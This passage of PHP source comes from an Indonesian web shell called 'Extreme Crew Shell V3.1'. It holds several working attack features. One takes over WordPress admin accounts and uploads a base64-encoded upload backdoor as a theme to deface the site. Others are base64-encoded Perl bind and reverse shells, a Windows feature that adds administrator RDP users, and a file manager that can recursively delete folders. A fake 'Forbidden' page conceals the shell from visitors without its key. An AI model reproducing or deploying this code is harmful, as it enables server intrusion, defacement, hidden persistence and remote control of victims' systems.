1746 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1747 $db = mysql_select_db($dbname);
1748 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1749 $result = mysql_fetch_array($q);
1750 $id = $result[ID];
1751 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1752 $result2 = mysql_fetch_array($q2);
1753 $target = $result2[option_value];
1754 if($target == '') {
1755 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1756 } else {
1757 echo "[+] $target <br>";
1758 }
1759 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1760 if(!$conn OR !$db OR !$update) {
1761 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1762 mysql_close($conn);
1763 } else {
1764 $site = "$target/wp-login.php";
1765 $site2 = "$target/wp-admin/theme-install.php?upload";
1766 $b1 = anucurl($site2);
1767 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1768 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1769 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1770 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1771 $www = "m.php";
1772 $fp5 = fopen($www,"w");
1773 fputs($fp5,$upload3);
1774 $post2 = array(
1775 "_wpnonce" => "$anu2",
1776 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1777 "themezip" => "@$www",
1778 "install-theme-submit" => "Install Now",
1779 );
1780 $ch = curl_init("$target/wp-admin/update.php?cr0tz=3xcr3w&action=upload-theme");
1781 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1782 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1783 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1784 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1785 curl_setopt($ch, CURLOPT_POST, 1);
1786 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1787 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1788 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1789 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1790 $data3 = curl_exec($ch);
1791 curl_close($ch);
1792 $y = date("Y");
1793 $m = date("m");
1794 $namafile = "id.php";
1795 $fpi = fopen($namafile,"w");
1796 fputs($fpi,$script);
1797 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1798 curl_setopt($ch6, CURLOPT_POST, true);
1799 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1800 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1801 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1802 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1803 curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1804 $postResult = curl_exec($ch6);
1805 curl_close($ch6);
1806 $as = "$target/k.php";
1807 $bs = anucurl($as);
1808 if(preg_match("#$script#is", $bs)) {
1809 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1810 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1811 } else {
1812 echo "[-] <font color='red'>gagal mepes...</font><br>";
1813 echo "[!!] coba aja manual: <br>";
1814 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1815 echo "[+] username: <font color=lime>$user</font><br>";
1816 echo "[+] password: <font color=lime>$pass</font><br><br>";
1817 }
1818 mysql_close($conn);
1819 }
1820 }
1821 } else {
1822 echo "<center><h1>WordPress Auto Deface V.2</h1>
1823 <form method='post'>
1824 Link Config: <br>
1825 <textarea name='link' placeholder='http://target.com/ec_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1826 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Extreme Crew' required><br>
1827 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1828 </form></center>";
1829 }
1830} elseif($_GET['do'] == 'network') {
1831 echo "<form method='post'>
1832 <u>Bind Port:</u> <br>
1833 PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1834 <input type='submit' name='sub_bp' value='>>'>
1835 </form>
1836 <form method='post'>
1837 <u>Back Connect:</u> <br>
1838 Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
1839 PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1840 <input type='submit' name='sub_bc' value='>>'>
1841 </form>";
1842 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1843 if(isset($_POST['sub_bp'])) {
1844 $f_bp = fopen("/tmp/bp.pl", "w");
1845 fwrite($f_bp, base64_decode($bind_port_p));
1846 fclose($f_bp);
1847
1848 $port = $_POST['port_bind'];
1849 $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1850 sleep(1);
1851 echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1852 unlink("/tmp/bp.pl");
1853 }
1854 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1855 if(isset($_POST['sub_bc'])) {
1856 $f_bc = fopen("/tmp/bc.pl", "w");
1857 fwrite($f_bc, base64_decode($bind_connect_p));
1858 fclose($f_bc);
1859
1860 $ipbc = $_POST['ip_bc'];
1861 $port = $_POST['port_bc'];
1862 $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1863 sleep(1);
1864 echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1865 unlink("/tmp/bc.pl");
1866 }
1867} elseif($_GET['do'] == 'tentang'){
1868 echo "<center>";
1869 echo "<h2>Extreme Crew Shell V3.1</h2>";
1870 echo "<p>Terima kasih buat kawan-kawan seperjuangan yang telah memberikan keperawa.. eh kepercayaan deng hehe</p>";
1871 echo "<p>Terima kasih buat IndoXploit & K2LL33D yang telah dengan senang hati memperbolehkan menambah atau mengurangi isi coding nya hehe";
1872 echo "<p>Terima kasih untuk kawan homo,sering colay,sering nangis,sering baper,dan sering seiring waktu hahaha</p>";
1873 echo "<p>Tanpa kalian saya tidak bisa menjadi seperti ini , terima kasih banyaklah pokoknya</p>";
1874 echo "<p>Mr.BucketHead - Khan007 - Mr.ApaPedulimu - Versailles48 - Mr.DreamX196 - l0c4lh3artz - Mr.AchanX48 - ./Mr.J - Sohai - HaXor Tr0j4n - ./51N1CH1 - Ndivic404 - FrozenBear404 - KidSZonk - Jje Incovers - Courageux - /Zeelous - fcod3x - McQueen_404 - Sadream - Chinax1337 - Mr.Akashi - Mr.LittleHaxor - zp3nzas - dll</p>";
1875} elseif($_GET['do'] == 'krdp_shell') {
1876 if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1877 if($_POST['create']) {
1878 $user = htmlspecialchars($_POST['user']);
1879 $pass = htmlspecialchars($_POST['pass']);
1880 if(preg_match("/$user/", exe("net user"))) {
1881 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1882 } else {
1883 $add_user = exe("net user $user $pass /add");
1884 $add_groups1 = exe("net localgroup Administrators $user /add");
1885 $add_groups2 = exe("net localgroup Administrator $user /add");
1886 $add_groups3 = exe("net localgroup Administrateur $user /add");
1887 echo "[ RDP ACCOUNT INFO ]<br>
1888 ------------------------------<br>
1889 IP: <font color=lime>".$ip."</font><br>
1890 Username: <font color=lime>$user</font><br>
1891 Password: <font color=lime>$pass</font><br>
1892 ------------------------------<br><br>
1893 [ STATUS ]<br>
1894 ------------------------------<br>
1895 ";
1896 if($add_user) {
1897 echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1898 } else {
1899 echo "[add user] -> <font color='red'>Gagal</font><br>";
1900 }
1901 if($add_groups1) {
1902 echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1903 } elseif($add_groups2) {
1904 echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1905 } elseif($add_groups3) {
1906 echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1907 } else {
1908 echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1909 }
1910 echo "------------------------------<br>";
1911 }
1912 } elseif($_POST['s_opsi']) {
1913 $user = htmlspecialchars($_POST['r_user']);
1914 if($_POST['opsi'] == '1') {
1915 $cek = exe("net user $user");
1916 echo "Checking username <font color=lime>$user</font> ....... ";
1917 if(preg_match("/$user/", $cek)) {
1918 echo "[ <font color=lime>Sudah ada</font> ]<br>
1919 ------------------------------<br><br>
1920 <pre>$cek</pre>";
1921 } else {
1922 echo "[ <font color=red>belum ada</font> ]";
1923 }
1924 } elseif($_POST['opsi'] == '2') {
1925 $cek = exe("net user $user Extreme Crew");
1926 if(preg_match("/$user/", exe("net user"))) {
1927 echo "[change password: <font color=lime>Extreme Crew</font>] -> ";
1928 if($cek) {
1929 echo "<font color=lime>Berhasil</font>";
1930 } else {
1931 echo "<font color=red>Gagal</font>";
1932 }
1933 } else {
1934 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1935 }
1936 } elseif($_POST['opsi'] == '3') {
1937 $cek = exe("net user $user /DELETE");
1938 if(preg_match("/$user/", exe("net user"))) {
1939 echo "[remove user: <font color=lime>$user</font>] -> ";
1940 if($cek) {
1941 echo "<font color=lime>Berhasil</font>";
1942 } else {
1943 echo "<font color=red>Gagal</font>";
1944 }
1945 } else {
1946 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1947 }
1948 } else {
1949 //
1950 }
1951 } else {
1952 echo "-- Create RDP --<br>
1953 <form method='post'>
1954 <input type='text' name='user' placeholder='username' value='Extreme Crew' required>
1955 <input type='text' name='pass' placeholder='password' value='Extreme Crew' required>
1956 <input type='submit' name='create' value='>>'>
1957 </form>
1958 -- Option --<br>
1959 <form method='post'>
1960 <input type='text' name='r_user' placeholder='username' required>
1961 <select name='opsi'>
1962 <option value='1'>Cek Username</option>
1963 <option value='2'>Ubah Password</option>
1964 <option value='3'>Hapus Username</option>
1965 </select>
1966 <input type='submit' name='s_opsi' value='>>'>
1967 </form>
1968 ";
1969 }
1970 } else {
1971 echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1972 }
1973} elseif($_GET['act'] == 'newfile') {
1974 if($_POST['new_save_file']) {
1975 $newfile = htmlspecialchars($_POST['newfile']);
1976 $fopen = fopen($newfile, "a+");
1977 if($fopen) {
1978 $act = "<script>window.location='?cr0tz=3xcr3w&act=edit&folder=".$dir."&file=".$_POST['newfile']."';</script>";
1979 } else {
1980 $act = "<font color=red>permission denied</font>";
1981 }
1982 }
1983 echo $act;
1984 echo "<form method='post'>
1985 Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1986 <input type='submit' name='new_save_file' value='Submit'>
1987 </form>";
1988} elseif($_GET['act'] == 'newfolder') {
1989 if($_POST['new_save_folder']) {
1990 $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1991 if(!mkdir($new_folder)) {
1992 $act = "<font color=red>permission denied</font>";
1993 } else {
1994 $act = "<script>window.location='?cr0tz=3xcr3w&folder=".$dir."';</script>";
1995 }
1996 }
1997 echo $act;
1998 echo "<form method='post'>
1999 Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2000 <input type='submit' name='new_save_folder' value='Submit'>
2001 </form>";
2002} elseif($_GET['act'] == 'rename_dir') {
2003 if($_POST['dir_rename']) {
2004 $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2005 if($dir_rename) {
2006 $act = "<script>window.location='?cr0tz=3xcr3w&folder=".dirname($dir)."';</script>";
2007 } else {
2008 $act = "<font color=red>permission denied</font>";
2009 }
2010 echo "".$act."<br>";
2011 }
2012 echo "<form method='post'>
2013 <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2014 <input type='submit' name='dir_rename' value='rename'>
2015 </form>";
2016} elseif($_GET['act'] == 'delete_dir') {
2017 if(is_dir($dir)) {
2018 if(is_writable($dir)) {
2019 @rmdir($dir);
2020 @exe("rm -rf $dir");
2021 @exe("rmdir /s /q $dir");
2022 $act = "<script>window.location='?cr0tz=3xcr3w&folder=".dirname($dir)."';</script>";
2023 } else {
2024 $act = "<font color=red>could not remove ".basename($dir)."</font>";
2025 }
2026 }
2027 echo $act;
2028} elseif($_GET['act'] == 'view') {
2029 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz=3xcr3w&act=view&folder=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?cr0tz=3xcr3w&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?cr0tz=3xcr3w&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?cr0tz=3xcr3w&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz=3xcr3w&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2030 echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2031} elseif($_GET['act'] == 'edit') {
2032 if($_POST['save']) {
2033 $save = file_put_contents($_GET['file'], $_POST['src']);
2034 if($save) {
2035 $act = "<font color=lime>Saved!</font>";
2036 } else {
2037 $act = "<font color=red>permission denied</font>";
2038 }
2039 echo "".$act."<br>";
2040 }
2041 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz=3xcr3w&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?cr0tz=3xcr3w&act=edit&folder=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?cr0tz=3xcr3w&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?cr0tz=3xcr3w&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz=3xcr3w&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2042 echo "<form method='post'>
2043 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2044 <input type='submit' value='Save' name='save' style='width: 500px;'>
2045 </form>";
2046} elseif($_GET['act'] == 'rename') {
2047 if($_POST['do_rename']) {
2048 $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2049 if($rename) {
2050 $act = "<script>window.location='?cr0tz=3xcr3w&folder=".$dir."';</script>";
2051 } else {
2052 $act = "<font color=red>permission denied</font>";
2053 }
2054 echo "".$act."<br>";
2055 }
2056 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz=3xcr3w&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?cr0tz=3xcr3w&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?cr0tz=3xcr3w&act=rename&folder=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?cr0tz=3xcr3w&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz=3xcr3w&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2057 echo "<form method='post'>
2058 <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2059 <input type='submit' name='do_rename' value='rename'>
2060 </form>";
2061} elseif($_GET['act'] == 'delete') {
2062 $delete = unlink($_GET['file']);
2063 if($delete) {
2064 $act = "<script>window.location='?cr0tz=3xcr3w&folder=".$dir."';</script>";
2065 } else {
2066 $act = "<font color=red>permission denied</font>";
2067 }
2068 echo $act;
2069} else {
2070 if(is_dir($dir) === true) {
2071 if(!is_readable($dir)) {
2072 echo "<font color=red>can't open directory. ( not readable )</font>";
2073 } else {
2074 echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2075 <tr>
2076 <th class="th_home"><center>Name</center></th>
2077 <th class="th_home"><center>Type</center></th>
2078 <th class="th_home"><center>Size</center></th>
2079 <th class="th_home"><center>Last Modified</center></th>
2080 <th class="th_home"><center>Owner/Group</center></th>
2081 <th class="th_home"><center>Permission</center></th>
2082 <th class="th_home"><center>Action</center></th>
2083 </tr>';
2084 $scandir = scandir($dir);
2085 foreach($scandir as $dirx) {
2086 $dtype = filetype("$dir/$dirx");
2087 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2088 if(function_exists('posix_getpwuid')) {
2089 $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2090 $downer = $downer['name'];
2091 } else {
2092 //$downer = $uid;
2093 $downer = fileowner("$dir/$dirx");
2094 }
2095 if(function_exists('posix_getgrgid')) {
2096 $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2097 $dgrp = $dgrp['name'];
2098 } else {
2099 $dgrp = filegroup("$dir/$dirx");
2100 }
2101 if(!is_dir("$dir/$dirx")) continue;
2102 if($dirx === '..') {
2103 $href = "<a href='?cr0tz=3xcr3w&folder=".dirname($dir)."'>$dirx</a>";
2104 } elseif($dirx === '.') {
2105 $href = "<a href='?cr0tz=3xcr3w&folder=$dir'>$dirx</a>";
2106 } else {
2107 $href = "<a href='?cr0tz=3xcr3w&folder=$dir/$dirx'>$dirx</a>";
2108 }
2109 if($dirx === '.' || $dirx === '..') {
2110 $act_dir = "<a href='?cr0tz=3xcr3w&act=newfile&folder=$dir'>newfile</a> | <a href='?cr0tz=3xcr3w&act=newfolder&folder=$dir'>newfolder</a>";
2111 } else {
2112 $act_dir = "<a href='?cr0tz=3xcr3w&act=rename_dir&folder=$dir/$dirx'>rename</a> | <a href='?cr0tz=3xcr3w&act=delete_dir&folder=$dir/$dirx'>delete</a>";
2113 }
2114 echo "<tr>";
2115 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2116 echo "<td class='td_home'><center>$dtype</center></td>";
2117 echo "<td class='td_home'><center>-</center></th></td>";
2118 echo "<td class='td_home'><center>$dtime</center></td>";
2119 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2120 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2121 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2122 echo "</tr>";
2123 }
2124 }
2125 } else {
2126 echo "<font color=red>can't open directory.</font>";
2127 }
2128 foreach($scandir as $file) {
2129 $ftype = filetype("$dir/$file");
2130 $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2131 $size = filesize("$dir/$file")/1024;
2132 $size = round($size,3);
2133 if(function_exists('posix_getpwuid')) {
2134 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2135 $fowner = $fowner['name'];
2136 } else {
2137 //$downer = $uid;
2138 $fowner = fileowner("$dir/$file");
2139 }
2140 if(function_exists('posix_getgrgid')) {
2141 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2142 $fgrp = $fgrp['name'];
2143 } else {
2144 $fgrp = filegroup("$dir/$file");
2145 }
2146 if($size > 1024) {
2147 $size = round($size/1024,2). 'MB';
2148 } else {
2149 $size = $size. 'KB';
2150 }
2151 if(!is_file("$dir/$file")) continue;
2152 echo "<tr>";
2153 echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?cr0tz=3xcr3w&act=view&folder=$dir&file=$dir/$file'>$file</a></td>";
2154 echo "<td class='td_home'><center>$ftype</center></td>";
2155 echo "<td class='td_home'><center>$size</center></td>";
2156 echo "<td class='td_home'><center>$ftime</center></td>";
2157 echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2158 echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2159 echo "<td class='td_home' style='padding-left: 15px;'><a href='?cr0tz=3xcr3w&act=edit&folder=$dir&file=$dir/$file'>edit</a> | <a href='?cr0tz=3xcr3w&act=rename&folder=$dir&file=$dir/$file'>rename</a> | <a href='?cr0tz=3xcr3w&act=delete&folder=$dir&file=$dir/$file'>delete</a> | <a href='?cr0tz=3xcr3w&act=download&folder=$dir&file=$dir/$file'>download</a></td>";
2160 echo "</tr>";
2161 }
2162 echo "</table>";
2163 if(!is_readable($dir)) {
2164 //
2165 } else {
2166 echo "<hr>";
2167 }
2168 echo "<center>Copyright © ".date("Y")." - <a href='?cr0tz=3xcr3w&folder=$dir&do=tentang'>Extreme Crew</a></center>";
2169}
2170echo "</html>";
2171}
2172else
2173{
2174echo "<h1>Forbidden</h1><p>You dont't have permission to access ".$dir." on this server.</p><hr>
2175<address>Apache Server at ".gethostbyname($_SERVER['HTTP_HOST'])." Port 80</address></body></html>";
2176return false;
2177}
2178?>